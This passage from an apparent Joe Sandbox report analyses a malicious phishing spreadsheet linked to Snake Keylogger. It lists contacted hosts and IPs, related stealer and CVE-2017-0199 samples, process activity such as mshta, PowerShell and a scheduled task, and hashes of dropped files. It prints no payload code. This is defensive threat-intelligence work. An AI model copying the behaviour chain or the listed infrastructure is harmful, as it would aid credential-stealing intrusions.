                                    exi.linkUnited States
                                    14061DIGITALOCEAN-ASNUSfalse
                                    188.114.96.3
                                    reallyfreegeoip.orgEuropean Union
                                    13335CLOUDFLARENETUStrue
                                    208.91.199.225
                                    us2.smtp.mailhostbox.comUnited States
                                    394695PUBLIC-DOMAIN-REGISTRYUStrue
                                    208.91.199.223
                                    unknownUnited States
                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                    208.91.199.224
                                    unknownUnited States
                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                    132.226.247.73
                                    unknownUnited States
                                    16989UTMEMUSfalse
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1492413
                                    Start date and time:2024-08-13 20:23:08 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 18s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:32
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winXLSX@44/42@91/14
                                    EGA Information:
                                    • Successful, ratio: 83.3%
                                    HCA Information:
                                    • Successful, ratio: 93%
                                    • Number of executed functions: 164
                                    • Number of non-executed functions: 126
                                    Cookbook Comments:
                                    • Found application associated with file extension: .xlsx
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Active ActiveX Object
                                    • Active ActiveX Object
                                    • Active ActiveX Object
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                    • Execution Graph export aborted for target mshta.exe, PID 2480 because there are no executed function
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx
                                    TimeTypeDescription
                                    11:24:44Task SchedulerRun new task: bKVNuVuE path: C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    14:24:24API Interceptor56x Sleep call for process: mshta.exe modified
                                    14:24:29API Interceptor134x Sleep call for process: powershell.exe modified
                                    14:24:32API Interceptor210x Sleep call for process: AcroRd32.exe modified
                                    14:24:40API Interceptor68998x Sleep call for process: sihost.exe modified
                                    14:24:43API Interceptor4x Sleep call for process: schtasks.exe modified
                                    14:24:44API Interceptor219x Sleep call for process: taskeng.exe modified
                                    14:24:45API Interceptor4375x Sleep call for process: bKVNuVuE.exe modified
                                    14:24:52API Interceptor39x Sleep call for process: RdrCEF.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    132.226.8.169OMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    KINIK COMPANY_PO-F24-0224 .pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    SecuriteInfo.com.Trojan.AutoIt.1430.22683.25135.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    New_Booking_02.vbeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    Quote RF-E68-STD-094.pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    IMPORT PO2024-0961 ASTG.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    Payment Receipt.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    193.122.6.168SecuriteInfo.com.Win32.RATX-gen.18099.32744.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    PO 8530240323.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    SecuriteInfo.com.Win32.RATX-gen.17034.6802.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    Payment Receipt.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    1enkJkLfUr.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Snake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    PR # 3000005991 - Quotation Required.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    Swift_Payment_Copy.s#U034fx#U034fl#U034fx#U034f.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • checkip.dyndns.org/
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    reallyfreegeoip.orgSecuriteInfo.com.Win32.RATX-gen.18099.32744.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                    • 188.114.97.3
                                    56500104990.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 188.114.97.3
                                    Deposit Slip 20240806.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.96.3
                                    Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                    • 188.114.97.3
                                    OMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.96.3
                                    ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.97.3
                                    PO 8530240323.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 188.114.97.3
                                    PO SSCJ-2406002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.96.3
                                    Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 104.21.67.152
                                    SecuriteInfo.com.Win32.RATX-gen.17034.6802.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.96.3
                                    exi.linkSecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.3568.4683.xlsxGet hashmaliciousGuLoaderBrowse
                                    • 159.203.133.15
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.X97M.DownLoader.1509.23983.22740.xlsxGet hashmaliciousGuLoaderBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.19627.13699.xlsxGet hashmaliciousRemcosBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.2521.6085.xlsxGet hashmaliciousGuLoaderBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.30690.22520.xlsxGet hashmaliciousRemcosBrowse
                                    • 159.203.133.15
                                    FedEx_AWB# 777187550711.xlsGet hashmaliciousUnknownBrowse
                                    • 159.203.133.15
                                    MT103.xlsGet hashmaliciousUnknownBrowse
                                    • 159.203.133.15
                                    FedEx_AWB# 777187550711.xlsGet hashmaliciousUnknownBrowse
                                    • 159.203.133.15
                                    us2.smtp.mailhostbox.comSecuriteInfo.com.Win32.PWSX-gen.25647.23289.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 208.91.199.225
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 208.91.199.225
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 208.91.199.223
                                    giehjhgjzJ.htaGet hashmaliciousCobalt Strike, MassLogger RAT, Snake KeyloggerBrowse
                                    • 208.91.198.143
                                    1CeVjZDVAW.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                    • 208.91.199.224
                                    3iovP5NjqW.exeGet hashmaliciousMassLogger RAT, Snake KeyloggerBrowse
                                    • 208.91.199.224
                                    NGL1Of0ZkJ.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                    • 208.91.198.143
                                    SecuriteInfo.com.Win32.PWSX-gen.19673.26192.exeGet hashmaliciousAgentTeslaBrowse
                                    • 208.91.199.224
                                    Edsha_PO.xlsGet hashmaliciousAgentTeslaBrowse
                                    • 208.91.199.223
                                    SecuriteInfo.com.Exploit.CVE-2017-0199.04.Gen.20726.10183.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                    • 208.91.198.143
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ORACLE-BMC-31898USSecuriteInfo.com.Win32.RATX-gen.18099.32744.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                    • 193.122.6.168
                                    56500104990.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 158.101.44.242
                                    Deposit Slip 20240806.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.130.0
                                    Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                    • 193.122.6.168
                                    PO 8530240323.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.6.168
                                    PO SSCJ-2406002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 158.101.44.242
                                    Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.130.0
                                    SecuriteInfo.com.Win32.RATX-gen.17034.6802.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.6.168
                                    SecuriteInfo.com.Win32.PWSX-gen.25647.23289.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.130.0
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 158.101.44.242
                                    UTMEMUSOMSG2024080890D-KHOJALY-LANSHAN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.8.169
                                    ORDER 0475.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.8.169
                                    KINIK COMPANY_PO-F24-0224 .pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.8.169
                                    SecuriteInfo.com.FileRepMalware.11227.27096.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.247.73
                                    SecuriteInfo.com.Trojan.AutoIt.1430.22683.25135.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.8.169
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.247.73
                                    SecuriteInfo.com.Trojan.AutoIt.1430.14095.11777.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                    • 132.226.247.73
                                    New_Booking_02.vbeGet hashmaliciousSnake KeyloggerBrowse
                                    • 132.226.8.169
                                    Uzbzdxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.247.73
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 132.226.247.73
                                    AS-COLOCROSSINGUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.9039.31863.rtfGet hashmaliciousUnknownBrowse
                                    • 192.210.150.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.24913.8785.xlsxGet hashmaliciousUnknownBrowse
                                    • 172.245.135.143
                                    Update.jsGet hashmaliciousSocGholishBrowse
                                    • 23.95.182.48
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.3568.4683.xlsxGet hashmaliciousGuLoaderBrowse
                                    • 107.172.31.124
                                    SecuriteInfo.com.Win32.RATX-gen.5931.50.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 192.3.243.155
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsxGet hashmaliciousRemcosBrowse
                                    • 192.210.214.9
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.20492.1802.rtfGet hashmaliciousRemcosBrowse
                                    • 192.3.109.147
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.26143.10677.rtfGet hashmaliciousRemcosBrowse
                                    • 107.172.31.124
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.18896.17784.rtfGet hashmaliciousRemcosBrowse
                                    • 192.3.109.147
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.26982.17078.rtfGet hashmaliciousRemcosBrowse
                                    • 192.3.193.155
                                    ORACLE-BMC-31898USSecuriteInfo.com.Win32.RATX-gen.18099.32744.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                    • 193.122.6.168
                                    56500104990.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 158.101.44.242
                                    Deposit Slip 20240806.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.130.0
                                    Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                    • 193.122.6.168
                                    PO 8530240323.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 193.122.6.168
                                    PO SSCJ-2406002.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 158.101.44.242
                                    Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.130.0
                                    SecuriteInfo.com.Win32.RATX-gen.17034.6802.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.6.168
                                    SecuriteInfo.com.Win32.PWSX-gen.25647.23289.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 193.122.130.0
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 158.101.44.242
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.24913.8785.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsxGet hashmaliciousRemcosBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.26982.17078.rtfGet hashmaliciousRemcosBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.19627.13699.xlsxGet hashmaliciousRemcosBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.30690.22520.xlsxGet hashmaliciousRemcosBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    SPECIFICATIONS AND DRAWING.docxGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • 188.114.97.3
                                    • 188.114.96.3
                                    7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.24913.8785.xlsxGet hashmaliciousUnknownBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.3568.4683.xlsxGet hashmaliciousGuLoaderBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsxGet hashmaliciousRemcosBrowse
                                    • 159.203.133.15
                                    product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.X97M.DownLoader.1509.23983.22740.xlsxGet hashmaliciousGuLoaderBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.19627.13699.xlsxGet hashmaliciousRemcosBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.2521.6085.xlsxGet hashmaliciousGuLoaderBrowse
                                    • 159.203.133.15
                                    SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.30690.22520.xlsxGet hashmaliciousRemcosBrowse
                                    • 159.203.133.15
                                    SPECIFICATIONS AND DRAWING.docxGet hashmaliciousUnknownBrowse
                                    • 159.203.133.15
                                    36f7277af969a6947a61ae0b815907a1product_list.xlsGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    SecuriteInfo.com.Other.Malware-gen.12504.4949.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    Payment Receipt.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    RV0mEFAxfl.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    Edsha_PO.xlsGet hashmaliciousAgentTeslaBrowse
                                    • 149.154.167.220
                                    Purchase Order PO11420.docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    Flytour.docGet hashmaliciousRevengeRATBrowse
                                    • 149.154.167.220
                                    SOA JULY.xlsGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    SOA JULY.xlsGet hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    REVISED UPDATE424 PO.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    No context
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):270336
                                    Entropy (8bit):0.0018811398465979306
                                    Encrypted:false
                                    SSDEEP:3:MsEllllkEthXllkl2zE+/+rO:/M/xT02zJ
                                    MD5:503326E635877A11B5618011B42A093F
                                    SHA1:46D74A99E9A2F5A47D9172AD305824EA9EEBF74D
                                    SHA-256:FFB25A68F0DCC5280DE3AFCEEEEB264AF9F3D4FC34CB607048E5323BCAFA162A
                                    SHA-512:1BBD34B45BDD542E4AF908207D49D80F9962A64E88297C84E7A91F9293D80A2DB4E799647B807EBEFBDB5CDF23224412E3475FEE87E717B112F120A96EFD6E37
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):292
                                    Entropy (8bit):5.175896944500403
                                    Encrypted:false
                                    SSDEEP:6:WofQEraQ+q2PP2nKuAl9OmbnIFUt8XofQAzAgZmw+XofQysQVkwOP2nKuAl9Omb5:74EraVvWHAahFUt8Y4Ng/+Y4ysI57HAR
                                    MD5:CC17BD61319D2FFB8F1F6FEEA059E806
                                    SHA1:61F52A57BED2351D0D7C3C80C4424D665DA21D38
                                    SHA-256:4953F66250F004CF40955C1D022AC8B6145036C2C56386025F7DADE53A62964C
                                    SHA-512:C8A4E9E1F9B62BFB77171A57E673F0B5C8130257BF58FC03089B1370F19C6C5AFBF1A862486968845EA9469B1FB084002002362D4FCBC04576E5D8BDB689FD3C
                                    Malicious:false
                                    Preview:2024/08/13-14:24:54.137 4028 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/08/13-14:24:54.142 4028 Recovering log #3.2024/08/13-14:24:54.144 4028 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):292
                                    Entropy (8bit):5.175896944500403
                                    Encrypted:false
                                    SSDEEP:6:WofQEraQ+q2PP2nKuAl9OmbnIFUt8XofQAzAgZmw+XofQysQVkwOP2nKuAl9Omb5:74EraVvWHAahFUt8Y4Ng/+Y4ysI57HAR
                                    MD5:CC17BD61319D2FFB8F1F6FEEA059E806
                                    SHA1:61F52A57BED2351D0D7C3C80C4424D665DA21D38
                                    SHA-256:4953F66250F004CF40955C1D022AC8B6145036C2C56386025F7DADE53A62964C
                                    SHA-512:C8A4E9E1F9B62BFB77171A57E673F0B5C8130257BF58FC03089B1370F19C6C5AFBF1A862486968845EA9469B1FB084002002362D4FCBC04576E5D8BDB689FD3C
                                    Malicious:false
                                    Preview:2024/08/13-14:24:54.137 4028 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/08/13-14:24:54.142 4028 Recovering log #3.2024/08/13-14:24:54.144 4028 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):292
                                    Entropy (8bit):5.175896944500403
                                    Encrypted:false
                                    SSDEEP:6:WofQEraQ+q2PP2nKuAl9OmbnIFUt8XofQAzAgZmw+XofQysQVkwOP2nKuAl9Omb5:74EraVvWHAahFUt8Y4Ng/+Y4ysI57HAR
                                    MD5:CC17BD61319D2FFB8F1F6FEEA059E806
                                    SHA1:61F52A57BED2351D0D7C3C80C4424D665DA21D38
                                    SHA-256:4953F66250F004CF40955C1D022AC8B6145036C2C56386025F7DADE53A62964C
                                    SHA-512:C8A4E9E1F9B62BFB77171A57E673F0B5C8130257BF58FC03089B1370F19C6C5AFBF1A862486968845EA9469B1FB084002002362D4FCBC04576E5D8BDB689FD3C
                                    Malicious:false
                                    Preview:2024/08/13-14:24:54.137 4028 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/08/13-14:24:54.142 4028 Recovering log #3.2024/08/13-14:24:54.144 4028 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):131072
                                    Entropy (8bit):0.005597679101775777
                                    Encrypted:false
                                    SSDEEP:3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l
                                    MD5:FD55D575475A6BD81B055F46FA34BA8B
                                    SHA1:289A6344929F221E19D2F9097A5907FE42C03855
                                    SHA-256:261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB
                                    SHA-512:F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098
                                    Malicious:false
                                    Preview:VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:PostScript document text
                                    Category:dropped
                                    Size (bytes):1035
                                    Entropy (8bit):5.1491631906969815
                                    Encrypted:false
                                    SSDEEP:24:kNid8HxPs3yTTtyid8OPgx4s3yTDH4id8HxPs3yTTtyid8OPgx4s3yTDHk:1kxPuyvt9Ngx4uyHjkxPuyvt9Ngx4uyE
                                    MD5:6D00E22D9EB30D348C37536576CF8FDA
                                    SHA1:9B25DC67FF07A375746574E8CAB4B04C2C6256D7
                                    SHA-256:3D5974589AB18957C2450C540A2267BEE0E5D8EAEAFD6E6363E6E2D62EA65D61
                                    SHA-512:84C4AB20B5888E6EFE631D4A9A17FF327C91876387AD299140E26FEB7565981473CC1C40FDAC5BA3A0A2FA623E2AA9E1041D44B55FF6E7E0635CE9E6E59AF313
                                    Malicious:false
                                    Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:276
                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                    File Type:PostScript document text
                                    Category:dropped
                                    Size (bytes):1035
                                    Entropy (8bit):5.1491631906969815
                                    Encrypted:false
                                    SSDEEP:24:kNid8HxPs3yTTtyid8OPgx4s3yTDH4id8HxPs3yTTtyid8OPgx4s3yTDHk:1kxPuyvt9Ngx4uyHjkxPuyvt9Ngx4uyE
                                    MD5:6D00E22D9EB30D348C37536576CF8FDA
                                    SHA1:9B25DC67FF07A375746574E8CAB4B04C2C6256D7
                                    SHA-256:3D5974589AB18957C2450C540A2267BEE0E5D8EAEAFD6E6363E6E2D62EA65D61
                                    SHA-512:84C4AB20B5888E6EFE631D4A9A17FF327C91876387AD299140E26FEB7565981473CC1C40FDAC5BA3A0A2FA623E2AA9E1041D44B55FF6E7E0635CE9E6E59AF313
                                    Malicious:false
